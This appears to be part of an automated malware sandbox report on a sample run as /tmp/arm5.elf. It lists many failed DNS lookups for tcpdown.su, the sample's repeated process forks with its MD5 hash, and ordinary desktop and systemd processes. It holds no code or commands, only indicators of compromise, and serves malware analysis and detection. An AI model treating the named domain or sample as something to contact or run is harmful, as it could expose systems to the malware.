          Jan 1, 2025 15:07:13.247348070 CET8.8.8.8192.168.2.130x45c7Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:13.254926920 CET8.8.8.8192.168.2.130x45c7Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:13.263041973 CET8.8.8.8192.168.2.130x45c7Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:13.270812035 CET8.8.8.8192.168.2.130x45c7Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:14.895338058 CET8.8.8.8192.168.2.130x2972Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:14.903615952 CET8.8.8.8192.168.2.130x2972Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:14.911469936 CET8.8.8.8192.168.2.130x2972Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:14.919473886 CET8.8.8.8192.168.2.130x2972Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:14.927393913 CET8.8.8.8192.168.2.130x2972Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:16.503617048 CET8.8.8.8192.168.2.130xd348Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:16.513207912 CET8.8.8.8192.168.2.130xd348Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:16.521327019 CET8.8.8.8192.168.2.130xd348Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:16.530440092 CET8.8.8.8192.168.2.130xd348Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:16.538244963 CET8.8.8.8192.168.2.130xd348Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:18.163531065 CET8.8.8.8192.168.2.130x96dcName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:18.171643019 CET8.8.8.8192.168.2.130x96dcName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:18.179389954 CET8.8.8.8192.168.2.130x96dcName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:18.186698914 CET8.8.8.8192.168.2.130x96dcName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:18.200762987 CET8.8.8.8192.168.2.130x96dcName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:19.807327032 CET8.8.8.8192.168.2.130x6efdName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:19.815381050 CET8.8.8.8192.168.2.130x6efdName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:19.822921038 CET8.8.8.8192.168.2.130x6efdName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:19.830281973 CET8.8.8.8192.168.2.130x6efdName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:19.838018894 CET8.8.8.8192.168.2.130x6efdName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:21.441257000 CET8.8.8.8192.168.2.130x4e04Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:21.449338913 CET8.8.8.8192.168.2.130x4e04Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:21.457077026 CET8.8.8.8192.168.2.130x4e04Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:21.464684963 CET8.8.8.8192.168.2.130x4e04Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:21.473297119 CET8.8.8.8192.168.2.130x4e04Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:23.053318024 CET8.8.8.8192.168.2.130xf438Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:23.061132908 CET8.8.8.8192.168.2.130xf438Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:23.069127083 CET8.8.8.8192.168.2.130xf438Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:23.076859951 CET8.8.8.8192.168.2.130xf438Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:23.084759951 CET8.8.8.8192.168.2.130xf438Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:24.695576906 CET8.8.8.8192.168.2.130xe204Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:24.703560114 CET8.8.8.8192.168.2.130xe204Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:24.711354017 CET8.8.8.8192.168.2.130xe204Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:24.719559908 CET8.8.8.8192.168.2.130xe204Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:24.727137089 CET8.8.8.8192.168.2.130xe204Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:26.376101017 CET8.8.8.8192.168.2.130x3a68Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:26.384202003 CET8.8.8.8192.168.2.130x3a68Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:26.392565966 CET8.8.8.8192.168.2.130x3a68Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:26.400634050 CET8.8.8.8192.168.2.130x3a68Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:26.408608913 CET8.8.8.8192.168.2.130x3a68Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:27.995223999 CET8.8.8.8192.168.2.130xdcd2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:28.003144979 CET8.8.8.8192.168.2.130xdcd2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:28.011203051 CET8.8.8.8192.168.2.130xdcd2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:28.018845081 CET8.8.8.8192.168.2.130xdcd2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:28.026211023 CET8.8.8.8192.168.2.130xdcd2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:29.613372087 CET8.8.8.8192.168.2.130x414Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:29.620765924 CET8.8.8.8192.168.2.130x414Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:29.631227970 CET8.8.8.8192.168.2.130x414Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:29.639477968 CET8.8.8.8192.168.2.130x414Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:29.648185968 CET8.8.8.8192.168.2.130x414Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:31.223368883 CET8.8.8.8192.168.2.130x8f2fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:31.231482983 CET8.8.8.8192.168.2.130x8f2fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:31.239200115 CET8.8.8.8192.168.2.130x8f2fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:31.246841908 CET8.8.8.8192.168.2.130x8f2fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:31.255871058 CET8.8.8.8192.168.2.130x8f2fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:32.900136948 CET8.8.8.8192.168.2.130x589dName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:32.908194065 CET8.8.8.8192.168.2.130x589dName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:32.915954113 CET8.8.8.8192.168.2.130x589dName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:32.923624039 CET8.8.8.8192.168.2.130x589dName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:32.931032896 CET8.8.8.8192.168.2.130x589dName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:34.549062967 CET8.8.8.8192.168.2.130xb7a2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:34.556976080 CET8.8.8.8192.168.2.130xb7a2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:34.564847946 CET8.8.8.8192.168.2.130xb7a2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:34.572650909 CET8.8.8.8192.168.2.130xb7a2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:34.580732107 CET8.8.8.8192.168.2.130xb7a2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:36.199201107 CET8.8.8.8192.168.2.130x5739Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:36.207097054 CET8.8.8.8192.168.2.130x5739Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:36.214795113 CET8.8.8.8192.168.2.130x5739Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:36.222254038 CET8.8.8.8192.168.2.130x5739Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:36.230411053 CET8.8.8.8192.168.2.130x5739Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:38.117640018 CET8.8.8.8192.168.2.130x7ae5Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:38.125428915 CET8.8.8.8192.168.2.130x7ae5Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:38.133320093 CET8.8.8.8192.168.2.130x7ae5Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:38.141263962 CET8.8.8.8192.168.2.130x7ae5Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:38.150407076 CET8.8.8.8192.168.2.130x7ae5Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:39.746176004 CET8.8.8.8192.168.2.130x7c91Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:39.753752947 CET8.8.8.8192.168.2.130x7c91Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:39.761873960 CET8.8.8.8192.168.2.130x7c91Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:39.769575119 CET8.8.8.8192.168.2.130x7c91Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:39.777462006 CET8.8.8.8192.168.2.130x7c91Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false

          System Behavior

          Start time (UTC):14:06:43
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:/tmp/arm5.elf
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:44
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:44
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:50
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:50
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:50
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:53
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:53
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:53
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:58
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:58
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:03
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:08
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:09
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:13
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:13
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:18
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:23
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:24
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:33
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:33
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:38
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:39
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:48
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:48
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:53
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:07:54
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:03
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:03
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:09
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:09
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:09
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:18
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:18
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:18
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:24
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:24
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:33
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:33
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:38
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:38
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:08:39
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:44
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:44
          Start date (UTC):01/01/2025
          Path:/tmp/arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

          Start time (UTC):14:06:45
          Start date (UTC):01/01/2025
          Path:/usr/libexec/gnome-session-binary
          Arguments:-
          File size:334664 bytes
          MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

          Start time (UTC):14:06:45
          Start date (UTC):01/01/2025
          Path:/bin/sh
          Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
          File size:129816 bytes
          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

          Start time (UTC):14:06:45
          Start date (UTC):01/01/2025
          Path:/usr/libexec/gsd-rfkill
          Arguments:/usr/libexec/gsd-rfkill
          File size:51808 bytes
          MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

          Start time (UTC):14:06:47
          Start date (UTC):01/01/2025
          Path:/usr/sbin/gdm3
          Arguments:-
          File size:453296 bytes
          MD5 hash:2492e2d8d34f9377e3e530a61a15674f

          Start time (UTC):14:06:47
          Start date (UTC):01/01/2025
          Path:/etc/gdm3/PrimeOff/Default
          Arguments:/etc/gdm3/PrimeOff/Default
          File size:129816 bytes
          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

          Start time (UTC):14:06:47
          Start date (UTC):01/01/2025
          Path:/usr/sbin/gdm3
          Arguments:-
          File size:453296 bytes
          MD5 hash:2492e2d8d34f9377e3e530a61a15674f

          Start time (UTC):14:06:47
          Start date (UTC):01/01/2025
          Path:/etc/gdm3/PrimeOff/Default
          Arguments:/etc/gdm3/PrimeOff/Default
          File size:129816 bytes
          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

          Start time (UTC):14:06:57
          Start date (UTC):01/01/2025
          Path:/usr/lib/systemd/systemd
          Arguments:-
          File size:1620224 bytes
          MD5 hash:9b2bec7092a40488108543f9334aab75

          Start time (UTC):14:06:57
          Start date (UTC):01/01/2025
          Path:/lib/systemd/systemd-user-runtime-dir
          Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
          File size:22672 bytes
          MD5 hash:d55f4b0847f88131dbcfb07435178e54